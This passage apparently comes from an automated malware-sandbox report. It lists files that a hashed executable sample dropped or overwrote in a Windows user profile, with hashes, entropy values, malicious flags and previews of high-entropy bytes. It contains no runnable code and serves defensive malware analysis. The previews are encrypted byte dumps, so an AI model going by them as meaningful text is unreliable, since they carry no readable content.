                  Preview:.....9Nm.....X.....;r..h4.(x.T.qW.._....Q.....T.Te8..a.i.b..?.}.2.N..;jE.J>.A.<..O\&..T..:....R..C+N.....$.F..R...M..o.|.......]..O...;.a.@.@.....B.E./J).(@e.(je..@.K.?........p.^.3 1....0.GV.t.6.z...}.o.>B.]DV.7...p.p....#... ...J....|C.._@.w\.M.1..J.......*.z$../.V....kc;...vOE*]..._....RO.^.!.(>ot.4.y.@+Z.\....-X.......+F......f.T....o13.|_3.`.\X.@N.....^e....%...T..K%.,6..|J.}.l.(..J..&......x.@.....##8_V...l.....Vt...AX.Fa.@..i..m`....E.....yBu..7.K......F..uF)fxifH............K....Pn39EV.?.{..M].]...UZ_8e.^`..n..n.N......g{^D...\L.....O<..e.Z/...T..K......o....nW".M.l/..\.,.$.<c^.Ee..._O.&.......c.......w....E....xH....]D....N....G.j.5.s}..i.7......w.`...'.*%9.A..:fd.....v..$...<....p`b...,\....Z4?Rsr.'.\?~3..Q..f. lU...K.Y.W.7.....H..!$8..fS...e.Q...3#y.LH28.$.8....4.IO3.jpJ.....N.7..B...X..K.......Pp....(x.Q.3.-+78.....i.i......2D..........&XH....:]..#..\.-@.n-.`..7>T..B}..U.........#.JX.z)....-..LBec...|*gHT.\..Tyhg..q.r.

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3384
                  Entropy (8bit):7.938702831300155
                  Encrypted:false
                  SSDEEP:96:bV3r2vNcxokbP2An9/iTmrYixQ5mU8MjSZ:RKlcoSPl9/jrbU3o
                  MD5:2EE6C5F17C515FABF5ED161A7B6DB21D
                  SHA1:CBEA41B4488F85DF9B943567ED541BEF3F0DDE27
                  SHA-256:DD47E25971CBB804BA39FAF7A4E71568DA64B1A9DCC0104B2D6F11544303E60A
                  SHA-512:A0D34B1A1E7DFE62D3310813B4367546F21679160792A0756D3DC391CB218662250DF8CAF0188CD64B45D1316304EAB01AE548D083111A6C9C3103615FB4A862
                  Malicious:false
                  Preview:<?xml.7....EP.q[.{GBM2......(.z9...6%..v\..w.p.....j .........f0.*..|....V}.9q...k...f..Z.{.....zFM...)K...7..W.&.....|..J.h.....[A[.....%.vB,.z.1....c..X.e.......r..^T.(H.)a...o|..j.".....f.....O.b}.xM.C\...`w+.+.md.b........S .(.Q.-#..Y...jB..W..i<..............~/..Z.. u.+g].....#...7[;.*.].9_q..S..<.30DJ......N\...]...........G.f...:.R.......g0"....z.W..3@E..w.z......k.JjV..N...c.~.U:/~f.@.._..1.=o..0.:.;.:.{....O!......;....._..m6.....=.e....L..8lS...F.y..~l.;^E..^\....6C...M...h3...5.-... ....X.)...x....L.Z7K.(.V.~.$...9*:..)..y\..a.K.....%o..N....:.....Z......*&EJ([:..>.C......#<C.O..d'j.}&.}h`.zq!.......|.}A.....dZ...s...".#v..K..f. WQ.....H.....F.M6...bA.k6.I...r....[.#i.Y...$.....B.q..!M...k.\..:.H..X.."\Y/..."v......fL...x.....5HB|.s..nr.._f....0g.Z.....E.O.7N..zPK.Q...d.{]..b9...].m..s.1.{W|_.7j6.....A.f...k..?..S..N.........r.@fo5.^>..v....UA..\o...Yd.[.R..9+..L0..'..C.X.p........`...H1=.=...K,7.%....s).J..f....o.U.).I+.4.dy

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6910
                  Entropy (8bit):7.974393349882814
                  Encrypted:false
                  SSDEEP:192:7g850rtfMSP0D5Bk7XszQ9iMQz5VqBsNj:7g85cN0VBqczQYXVHNj
                  MD5:79D1CF98C7B4D059C4497DEC733CE2B4
                  SHA1:DEB1FFCBF2B7D5839DEB529CD459A590C0EB5E5A
                  SHA-256:4A05AF782DB93F390BDE65E434268A02CECF13EA3350F2D0674006F75C075067
                  SHA-512:6DD1DAC26A0D5CEC2FC701B31DCDADE87A24B129236836B5FC84ACD2BD0D2466AB78765B5D54483D2409F7F200862BB5A1C503776FF6D9BA9B53C98F27C633E6
                  Malicious:false
                  Preview:10/05T.d..p...........n.3.-...o.....7....G...M..}.^m=...N..T/..$....4&..`&.....)......B6.W..{,..s.H,X.~.;.$5.i..F. .h...'...fM..w.q..;T}..TN-...G..u....,SE...w\..(.F..c7.LE.U...T%.cXLN..S.NQ.].......[[....U...~.vS...C..)x..mP.CN-}Gu..^.,.{..".e.s.o.M..C..@.|.O.~.WA%.C..]..g.[.1Cz`M\f..%$\%.D..v..7...2.'.5_.O.%~`...p77>.@..5......b...&....F7...x..M..6...2.bA1....jC..r@..RU.5.n...4z...V..A..o+...]-......<X.....WV.....T....{l..9Q's.P%|..u.-F.Z........]...;.~_o%..LDU....,....L?.7....].O.4...P.C.h.TL.G^/.9...T..>l-.y...x.0.>.....B+....,..2.7ELy..:^....f.=#....O..Zj...z6.._.5...I.K.^...u~.K..?.T;...0m.~m.4.#.....y..........>.....C.2..~9..z......- ...w.w.P......e.%.....YR.....M[..w...~...[AI.N.U..9.....+9.#.Q..X..u0.J.A2...o.l..m...N.Ce..wTn...F.......Bq.../.E...3.l.O...."puF.}.\IX......AH#...Wu...1...~C....HS........W.b..<.tncp5..B.+btT+.A...."@..~L.e.(...@.^...<...{0.c.y^_.....zm...t.V$...;`sVF./...;H...p.c..V.G..5.....)...U..i....

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                  Category:dropped
                  Size (bytes):834
                  Entropy (8bit):7.709405280168827
                  Encrypted:false
                  SSDEEP:24:QgLQN4sCYefROglQf22pYxf7tmCi3gfIkJpgS3zbD:1LQN4sCbLzV7tm9SmS3nD
                  MD5:1A64A473AB70411D6B930E3EB726937E
                  SHA1:ACF1403859E14790E0DCA426F0582AA373C2800E
                  SHA-256:AC4243E44F3394A3F871DF466F65EDC9FC5FEF7FF5C5C416F330695961B4E92D
                  SHA-512:0EA9C451376600FA2F8BAAD48F663808B181752097085FD451161B2BBCF57E270145DB918974EAB4CC7DC1CAFDEB213016F0CA89F13DAC60B3111AB9038E3E36
                  Malicious:false
                  Preview:..1.0...g].....1..R.T....#.. -.F.c.g.U.^s_%BI3.;.....P.].".]..~.k....q....?.....qdil..].*J..[....*...t.t..+........K..w...z........U*|(.q..~..,.nfpnQ....B...As_...I..+...}..k......p./.j0.].[A...3`..-`.1....A.+*..N4.Y...CZ.b'N".6M..........[....Z,..f.HD..N..h...8.....!.....Cepk..Ye.@v..Z....".......:.......j.%..Y.yH.._r.....HG>.....K.n..2..K....P.5]......y0.Gq....x.YZ.. c{.*s/I.$.cg.~Qnxnjc..k.q..x.o.cBi^......a.]..../.|.N.O."..j=cb8.~.Kn..E'..Bv..J..gwM.%L.A,......n4ZC./.z/a...o....a.G;.T..P9m...9JM...1j....qa^R..a.>....}..>W.UWi..P....[61.|.....#..N.z0..n".........|...e...i..f.o/......0......D..p.......]....2.6.bi.....mN.N..2..P.V*j...u...l ......ZA."....$.iN.(.g.q..F.cxUu......L.......f7.%....CA......H.H..;.^.Hi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-UserConfig.log

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (870), with no line terminators
                  Category:dropped
                  Size (bytes):1742
                  Entropy (8bit):7.897127674945163
                  Encrypted:false
                  SSDEEP:48:rviEobU2gt4pIxe/hWKjHi5/ZWbcVJhTPr1Om0cdJSMq23nD:ra5yLI/wGHmVJhTr1N0czSY
                  MD5:66E94343EC2D33A62DCB7DDA57EFB301
                  SHA1:447AD5FE4CF170A26E6827C4AA06AD66C8E1DB1D
                  SHA-256:E84C9CA9F88F51B6BF5A24800E9DE7570B345BE3E5117BC10D3953506638E359
                  SHA-512:3CFFF521DBA53B7574EF67EF2B39CB473FE3B760E3F3DECAB61C535D74C16C740E4FABD4DA091205DE86ADB0A8C9151413FB5F8BD97DF8F5820138D0088C4727
                  Malicious:false
                  Preview:..1.0u.C..".\M.l.....<.3..e."...|..!...W...m..,...U.C,.\t....5...[?n.'.x..u.."N+..U..r.=.....m....i.....!%..R..U..M_}...|X..z...../V....].C........"!..snN]@.J]).\.H..j.]~v....g.AA.&S,Xo=9S..q"\..f..HS^.......|..,..`.2.n..;C]SH.1J, ......vo..J..M....c..B..N]a.....]../.ZK$.Eh.P..dL.v....z.!...R.....)....,hl.....M..E.+..3.2.Q..."..K%B.....^_.^.5...E..}.f.wJ....P....\....6..1.(.4H+... ..2.F..F=N3.....`.?...Igz......gk.....=..O".E...D+c...Z.n......l....0.......&gg0......;.?c...b...'.T(j.,.......Mr....6^....w~B.p...}.n!~.(.=.#.a./.*...>..H.....Z.p3.O...RLA/..^B7..F...<T=..y.>IN.."dS.....f@w.,u...~F.re....f]u...Q..^...,.@L..^.>2..8....*.4M.{..2..S.P8.....;+5..\zp\.^6..G5........B...U\C.Kw&.\.BM.....QJb. c.Wu...o{2....>.Zt..uIT...<..G=>.7....v.....Y...A.;o...1w......6.]..H%.[p....'...d:2............O.;,X.....{{C.....Q.iX..J.9<..`66I.2@....P.s.!'d.(...|m_o..y...........k.#gC.o.i..k^..]...-.....`d=\.....!Y.d.Q.b*.4Oa.......e5Hq.......eej:ca.

                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1062891
                  Entropy (8bit):5.530767242533431
                  Encrypted:false
                  SSDEEP:12288:phlrxJ0jTG8PgXSZlV0N8x5thr291gess3TylunXC:pjrx2q8PV
                  MD5:5A8DA32287F562E6ADC513234C884BA4
                  SHA1:7B62B4D448AEA17C4E86EE66525A22F33B8A4411
                  SHA-256:59AE5B99E23E625180788C0CEE003A008AEBC3270935FAAE69C4BC323C8BEEBC
                  SHA-512:4FC63C7D4129CC8343EF60E5A0DA8EE2486B9D409C3EB7523BA43100EE3FF5AC1B39D39D038F33EF1E7F6E0ACA0A605660EE225EB5A4AD7A1C58CBBDC2D9F066
                  Malicious:false
                  Preview:<Rule.Z.K.8.S.e..c...:.%S.J.6..(A@........zs#p|~..-Jn....;>.......|8.V...FJ&.....8.rI.....P*.f7w..x.....@r...G...&!..|Xp..0^.MF4.......f..J.r.\JU7%..$n....a.8:.I...H..<.U...Z~.&A.@D].......K.R.?..Xl..\...T.>..i.@sQ.+..9.."..6N*.~..lj..7.nGm.0aG.....S^..Gl.z.....:1.tn.....<...Zo..J.........W...%/.1..4...I........;..X..69..-w75...A.l^...J........f......Y3...=f.r.....\.e.u..$O..`.........?[/c.L...M.j.R.....Rn...E..\.j..e.W....c.9...6..2C...../.rm'F~}GQ....lg..f....U.<.....U.O`Fp.}..)..._...c....R.....L&.\..'.}...1......o[9V....."..hp._..Qd...+]..Wm....J...<..=...%..BUi....s..<.6......_.....{....]r.;.| S.......$}......i.x]..7.._;......*...v.Pxp.....L.ck.....t<.....[..V...0.c..........?.........?.l..:v..I..0.A..g.OCX...\..n..........+....RS3...:X.&X( <0.....N.v.....z{....[.....M2..6$.....3..c...]...2D=.._?*.#......;..N....5....C....^M...C.+......4.es...p.A~.k...Nyy..x..:.4..t._...K+.x%Z.g....Au{.o..~...T.p+...d.#N.W....vX.._..O.W.r..@...

                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules.xml

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):320311
                  Entropy (8bit):6.633726832530076
                  Encrypted:false
                  SSDEEP:3072:yJ+YV4sO9c7UWZIHVhFZLBx7/v/N3D6++nySU7JZHHqPaw2EAd89Lw4/7:nYVtkc7/IdZtx13DoyX7JJS9AdwpT
                  MD5:59208F8757594032CB8F5299E5C1BF50
                  SHA1:222A151CB982B25076AE44B50D937BE0F2507084
                  SHA-256:D8CB167117E83C342D73C5BE97F7CD03C61C8E5A57AAD7292B8FC8A774B82569
                  SHA-512:F1B6EEB14B9326CC875CEA50A66A8462672A7796517BD0DF146E23300FBA99B8C71A8D712751014AAE1083055B8E89CA0C47BBA054B51F7FC433E8FA24036675
                  Malicious:false
                  Preview:<Ruley9Kff...;..+....S%.ORz..1.o...7.....5...s.P.........|]a...8.2:$zw)...z.H..6.H....du...usxf#\m....q...0..q..i.%.5.3.?......@37....Vc.......V...=%...y.t....N]..w..1.......$........J#y.4X.....Xk..exh...o=..q.H.13P..sq....w.3....;....>..?../...i.\q..U.0.0N...h..b..Q..^.^..p..+.<.._.coF."Gtz.*.M.g+.m.Z.......6.......j.t.QPW..IX8.axw..@Y...y....>D..Y.dp.`.Ap.XZ.N.\........@...t..@x..=.v...P .WH.),)l.BlW..R.a.i....]..U..jNn-x5.mN..x.XIK.X.odF..&y.m.Vae?<W`).<|...y.K~....`.ZB....]B.#%]ct.7.4.-."cmE.?I.....M.......(.......W....U..Q..2..`..3..{x....!9H....t.Mxs...}..K...3..O.r(..X.He`........H...,.5.H.+..A....}.U..w..B..o~...T'.I...o...]./....6q....T./+.!...^%.}.O.a.km.K...e.z..=..X............>h...m..y.HKaD..5..$..)I..[[..&...y..5c.}.:..........Q4..EV...[..V@. &.u.n..x.Up..n.t.M....yu...`..~.b7hg....1>..).9i.......$..+>....8K.....().(..l..0...}b..+.F.d......$0.8...s.b+.O.L.c.{.......`-L|a........~..\...2"...O...x..S$.......G...(_....-

                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):361051
                  Entropy (8bit):6.514572838232696
                  Encrypted:false
                  SSDEEP:3072:Zknwl2Qrprufc7TvWzBrvFQPOElTic0hKvSti4VF+lT19FSmzc+kAWLK2/5:fl2Q9Y19rvFQrleb44/C3glMk5
                  MD5:0C239D2D2BF057630051E30299ECA539
                  SHA1:BFF2651A18481F9A64963C271DFD1B2F6C5AA6F4
                  SHA-256:38D49DFE71CD0BD3F6CCDF4257F563B03364CC4144468EF405E5305C423AC632
                  SHA-512:B0DA19B1B7DCB589F7BB92C5638AAEF603A7E2ADEF729461511DC5B084C5FEE1F1D3CC10421170DB33C3C532CBCBA7837A643A7835EB609E99AFB3D21FDF964A
                  Malicious:false
                  Preview:<Rule.....C.....}].w..y.=b.}e4z.C.....T...8ph..C.66.e........{C.`x...x.A..P].D....>$Q..R...1..h6.8..E./Vn.2..R.;Yq.E..v.w.......@Y...QG..0".F..=$..13w.....v..a..N..:.,...W......N....-..R...p...9..BYC..F.PD..I~!...v."......w........U...J.{.f.k.X.U:...TW9e.'..i.<G.8.Z.;Q....ukh...c..{....L......o.....h.....\r.:vY.w......B|...G..&.u...&)....4...:L$.j..t..0...s.j"r0SBUj.1...E.N....>....|=cS-Q.?.c9V......Jp[|.sb...N..A...k..?1s.D...DU..hc.xj..n:..|..\.m..]..S<.b.9...`P\....a.y..... ...EB.F...G...3e......-tA0.wX..4..y...5.!@M.l.k...0.WR....{c~jCz1.................&.....PF...]...........?~..7.....F.w.u;.G.)Z..~.c.7.?l....BU..*th.g.o....J.......[M......?d..N...;!...X.l..d...Zy..;@...6.S..l....2@.~.x.-..u?..1.{s....`.L'..(....f.;C.U.3.B."._E...6.\Ox....:$.#....[..e9r.(..3..........w.....I.S.j...A..&._..Kr..Y...@~fR.fT.Fu....Z..+}7.%<.....<|0...d.. .Z"..8m.va.X.......M..4..r..#.N...:/*........B^....I....6.....D....d.w~M...>(.3...}.Iy.-..^m

                  C:\Users\user\AppData\Local\Microsoft\Office\Features\1-7FeatureCache.txt

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1098
                  Entropy (8bit):7.823795818429725
                  Encrypted:false
                  SSDEEP:24:MYXseL9hFzhEVal8wpdfGJlkpdYgYNyEEOFj5aXD/m3zbD:MYXNPFFE8VO3kpdYgYE6eT/m3nD
                  MD5:33C96B3B2A9F7A7542FEBA9905D1BEB7
                  SHA1:5F07F8AC2F2FC213D605885F95B1494653B40FA3
                  SHA-256:034ACBD43046B9E564DFE58AE9306B7049DD20A364744D6DAA1EAAE8031F87CD
                  SHA-512:B4C71155F7DBC1EEA877F0A37044CD76160121C9D67C5F6312045F8EB389B8D528D4D3BC9BD22A697C2C2031C9230F1B853D302927288F7366E63C83B4914185
                  Malicious:false
                  Preview:3.7.4.d....S...I!+.....e.6.+.q{.....R.RLH..B....z....7.G...^..s.x.&.eu_.... {).TW..!..Q`G.X...&....w.F'dF.L5n.....N#.*F..9.K..z...<.{..F8lj...Hg~....}9...}.....Zv.`..3.P......R.*U.~..fg}:./..).nq..E..8.}7..z.........s...Iq.....3@v..wM.x....;:N..z@8....1...~S....q...s~.>C.......5.*T.aW[..b...m../....b.R.I(. .u(.......=....]."{..._.,~....0K.2YV...,vg2...$@...2.}....M....5..P7....[.b:..<m..\.Ay/.3C.....5...).."...;...Ie....5p..2...+I.. O...LN~...<O".......j.d.z...|..9..a..y...A.T.k.......(%.......z.h....:.|..Li...'S.Q.k5[0.!...V.<T..f...{.L.1....b..*...o.Fv8.....JV.....i..|....Rq...3...a...,+.z.J....%2../.._.....5.!..UO....`.I....!~....O)G.>|q&..O.d.Y5.F..2...!].x.1KxUd...9;.?;.K....s......#/'..+..~..=..t..c..P..."...Bb...5..pi}.B..p..D..h.Q..|....\>F..jc...B'.;....r.|Z...\.e9)7....>...;.....6....o.......`.N..<.;..v......$DC..e`.-.m^...F..q.[.g..L-+Xh&.....u....w.*..7.T?.:(.._*\..vyh.T...X...._U.j.......".."........|.E..Y9.1Wo....2q..O

                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.992674801553706
                  Encrypted:true
                  SSDEEP:384:FYYVOBBvimXPhl+1peoP3fMx5STWAVevpwA9qHbSnZgVxKhOROX2D4kkKfut4:FO31Xpl+1pfXy5STsy2nZgV4QRHrj
                  MD5:A342348E6EF6813B0A3F469C9FCFB760
                  SHA1:5F53308ADBAD2E0FD292FADEDD2EE355C6BB730B
                  SHA-256:FBCCDC3EFFA53337AA400F1A77186DA2BBB4A109582E9B4FEEF27CF66F517483
                  SHA-512:B2A7E8F822E675881A83C40BB3195F2AB81F65BAB505DDDC875ABDC202B7FC48B6D53FD35A8678AEC91C966B0EF5724242E42F2910FDA8B476F779408D37CA67
                  Malicious:true
                  Preview:SQLitGk...sI..........|.z<..*Y...5""...aAM. .`.....Z....IO...;....N.v......kT..j. <.."k.4..j...sL.i.4...$.V'..3.M.z.....n...f).......Z.E7.B9...R_......}1.g\.V..l./@..Q..f....1>XJ/..L...H...Ai1%.\7..N........Fu.c.mB...s....P.:.{...[.|.pU....\/..+.f.\..O."....x.,KH.....y.)...a2z..m.x@S8^3.tl...v...b....8.$....E.t..a....6.B.g.....zp.....fY....(.R....".(.... .3G..$.....#..aC..&u7.>L.N#..Sa..RT........O...._f.....'\H...Z...e9lf...&d...m......W...<c+W%b..i.-x;..]fCK*b...^].S....6....AQ2.....e,.Z.".Q.a..1Rn.........8.b..Y...G&c.]y..k.....1U..J.@.(.cd....`.E{o0ldt.n.u.J....}Q;Q5..F......%6,Ny..J..!.u..W.L].'.ifi.T.\$............_9.z1.k...2.^....j..cOb......-...C.......>..U?...`...../..s.i.i.>;#[......=<......X.I.id...{S..Gh......1Y...8.......\...iG....%L..x.T.0I.i..M.ER.A.3..K.e.;..xg.Y.W-../..)$.._....J........[d...~~.k.A....}..Z.%.0q..3.gy.^D...<..a..A..i..&.$|.[}j.....v..^J4....uo.rj...p1J,...zM3.I.........pL..'...J...<...Q....J....%.Z...Sp.|../&.

                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.99256097276253
                  Encrypted:true
                  SSDEEP:384:u27scSii3qCs3MM/Sm754nEUGswVI5t4LuvSpNY85lqOLwiGQ77vOqva+n4vb4F6:H7szs3am7bBVoUpNxlo67vOiZ4d35
                  MD5:10C5646BFB55BFF7D2FEB406626F3796
                  SHA1:1D40BC074694BFA60BA7780FF3F81D0ACEB7BADD
                  SHA-256:FAF9AFDE6B4624D08C8F9E7D44BBE1CCC5A39A44537C971F458E2544FCF35182
                  SHA-512:02828402F9199020D2C5228277135319BA854D518334A4DA1ECB977FFEE47F6470C2A4DC398A533D405A2C3F90CA19D85377981E18598C7E6B51075F21DDDAF7
                  Malicious:true
                  Preview:SQLit~\.\8.y.T_..bdT1.........H_..n.73F..I..C....c.....t.B.+.U.I.....?...'..u.<.Q..7.;i..} }..N...Q".o+.L.I.=.#.I..Dh......8.LA...u.........6:..C............8...u...av<..J6.a<t.K..t..~.\8s..|c].-//42..2Y.7....X}d...9....3.:.....cv..z.....w/k.|..:.f...X.}.....Or....f..X....%;_:($.c.l:.)"_...t3sF.IS....P.Z.....I}i&.G.;....N...6.y..1.....*.....`=.JC.bH.,<Oql..{^^q...!s.B......S..z.yz...?{....'..N8! ..d...+9.g8..c...5Q.............+T...RV../a.....8.]..n....8..B.h...>...2....q...p...d..s....$..6.C(Y.4.'.F .R..>.dB....bJynF...3G,X'.p.e...........2..b{.L../.[,....n...2J..rO..aN._.q......I..0...3.>.09.d...n4WWl.k....B...)h./.7....O.8.#&.<Z".dBE......L..R..8j.q.rr9.Y>.H.D6.C....1u....nxT.(MvH..P.<n....B...w....*...hr..,....R...WS...R..m.U...).2.YG....?>.......]?...u.l...z.<i.No.i..u.s&.v..{?#.......v.......u...*"-.}....@.:.3U5..`.fa........g....<....c9S3.$.=.h..}B~.._b..T...\2...Tf.{|........a.<.5$.R^..l.;z..vh................Yb.....]..^.\ck...5w.

                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.992431862312928
                  Encrypted:true
                  SSDEEP:768:00pHanUtNnXfDJUTA2p9c/4uE+rmJqT0BI+w3CCU4:00VRLXfD4A2pewuEO108yC
                  MD5:0421DB46B7C8FD80607DE9E6D14307EF
                  SHA1:868670A840017B51CCC87946C1DFFAF923EEE73F
                  SHA-256:9254AFA679B1B9D9ADFABFD7A5AB5F78BC774A58EF7901FD66855159931CBED8
                  SHA-512:17E1A1710C78AB5A65F60B7E9CFA9A77A36D27007094B502DDCCE218B2BFD5E321C0B4BB5A54DF2201C6BF18B99BAA333C972B35A2B0F7180EB4D20F9B7A5C9F
                  Malicious:true
                  Preview:SQLit........O.j.......)Ru...v......h.Uq \u#....s.&......*.3oQ..."(..C.W../S..;B..T..........\.....2.1..rD.......>...6......U..7.....<i..~..5.06qC..=--.^Q.....X.Z....?..y..q!y..pB.[.>Z..(.`..)..C4.xF..e`F.....*#..2)....0.0...\..0.........g...*a~}XsFl...b.U$..S.,....1..#p.P."..r.....Y..'.....+...RG.k...P.,n`.../....}n........@N..5...W.TA.|....HG..A$......g......a.U.M1..d.........K.W.H..d@.D.y..r`....E...lY8.bnkV..S".=F.Asp.{:\.XD1...N.N6&~..&R....{`...np/;[...t.6.=....o."......S.....~ZX....}&.....sW.:..rx...0.8U..=.!.G{.........5q....Nl.=..W.|=..Hf..oj2#67(..8...!.&.....m.~.=..|l.h..>.....,.W[..J..@.1^...w<.%.+.c..u...:kZ....( .+).....hB........b|6.:r.0.Nb...G?.....a..v......%....x.\8%..o`..I.q....X....{.\33c-.......R......p..C~."..1...G.M.......tx!...&.T=.q.g\...].d....u.$>....t)..f.<'RMb.P.iCM.......$.97..k......M..s.F.P.....If..v.t\=.F}.%...........1.K.....fb....K3..&..K..b".....,.&..T..g..YS.}.3.6z....2..'. ?.>qU...}....f......%.O..y.e\.

                  C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.992141104328903
                  Encrypted:true
                  SSDEEP:768:Mik/7adPkecCw+F1E7lq6lp0WUyjjnNQs:Mik/4ceRG1lrh+s
                  MD5:DB2F86AE4AAACFBB7EFB7EB38705CF82
                  SHA1:DA7B55C3319B5798BC7F309ADD8F8A995C3C24E5
                  SHA-256:2D6B3BAB13F7DBCFDFBD7251B1625A854E3AD755FCFC067A689E6C79EFBF541A
                  SHA-512:7D6775645C2DFAA6C6D644D45019444D10F9106BCFF76EB17C91915914ED5D96D25C20D76A9F81F3780A9693C74B3CD983203DB76E4D7A40B4BA18CD00D5FB7B
                  Malicious:true
                  Preview:SQLitd8...v.......).qR.D...M.60.a..-_Tu...W...y..-.7n5.....\'7.2.....)..*.AA.~./.h..j........6..!84..q...6.^.j.Tv2.6].g..i.6............W.$~....N.O.O.Q.......Me........*.A%..+.[.E....V.......?]B.......-.m.lZy5/...q^.Z/................+Y...z.a......i"...!C.j...wy..ii......w.B.^.q...3.$... m...=.D...h.....q5.....//.....P=@.C~....f.T&m...yZ..'....H@0....cA...dj..0.....kG........W.....A.Vuu.F...jOd?*.H.._ .v.3..........|.]......F...s.eX.;UF..eP...b......[.,T1.m7b.0......{n..`........$...TtSn.+...}e.........U4nk...5l4.p.I.Y.'.......TR....U..........>,F.1...w}..."...)..1..=.P..r.)..#[.+tb....z..C.....~.:.$a.........S)..g...C.s..Z..n..N..a.O#/..l...c.qm.i.7a.a....|H4.*.$%..W*..X...L.<.u..9\d'.#..rp.m..3......+e....S.y..x.3Y.}.:...w..G.R.d.0:*.L...]s..3..h.&..{...M..O..(j...u..eJ...2u.q.\}........R.&.Q|.U....3......./.}.1.}...._'...`|.i8.<f..q.G.(.M../..\k.n.H.6p.......m.;.9...D..FI..o..um.}..n.W..eU.~..|7.....J3....yrzA%L.4g...

                  C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1350
                  Entropy (8bit):7.862957433111495
                  Encrypted:false
                  SSDEEP:24:Y98CXHJMhLzbhExuVsKjCRdaDfJwhFjvp0ls9lY7MG48W5DIAQCKekiS5R3zbD:Y9VHeVzbhExuWKEaCv6s9lOjW5LnDS5d
                  MD5:C6B153C6FC8B321F9B0FB135E16E8155
                  SHA1:5014836428C315DF5450B3442E750A4655F75F17
                  SHA-256:A35583B3759DB5D74FF5C77741C58D877E41BBAF92C77F2076587AE0E13CB04D
                  SHA-512:51CDC2BFA296D7841DA1B16D5348B25CD094B573864C83DD47697930A619F20BB8B8127B386E284A0D64A03D0FA79BD6F73CEE355EB06906186985BA34C81E39
                  Malicious:false
                  Preview:{"Rec[.2.9.JmfL..[m=....~....R.(..'.gn.p.<.....v.u{.l..]t......7.a...1....99F.>.mh.........2k/.i..<......<@.,t[U..[.../X..M.u..,..,...W....x.?V...g..../SN.C$$....y.Ijt..X.H.1q.?..z....P..x...U.'......9...5...T. ;.....O#...N.a.....T...I..`.)u...>..>....*9..b.E..#u.....}...9...r..?.,Oa...h..`.}V.WR...O-U..[;...d2:....s.}.h.....X.O.h.s....{..F79..k..Dm..9.}...|..q..........A.S""_...A...{.q.oP.f.L.J.T.]..F1.).Xr...j..N.a<.>.n...T.2(`.X...W....Yc..k....$.@H."......'."..f....q.....j.]4............&..\@..|l.&..e...>+....>.......T_iP..v.V.H......Ra........$..|yr.o..G..Q.F.o4o|....U"\.N.....k...-.bq...n..0~J5...p.D<..(Yn=..k....=d.n.......6..p.8U....._.|..X..2^......I.%`y.d.. .n.I.+^......{..6j.....eLx.4.Q..~uSGN..%..*.2...X.%O...an(...b(.`...y.......T.Z.....7CR...[.p..J....c]p..`.u..N.fYF.l...@..M0.......f......C:.+..CG.S.=.j..gG('.1...H(..+.z$ ..*.-..../3...Sl.bas....Y~..N..a....<M.Hh.......~.....E.y.l;.....M.F..Y.....s...(j.W...}.('<...G..D

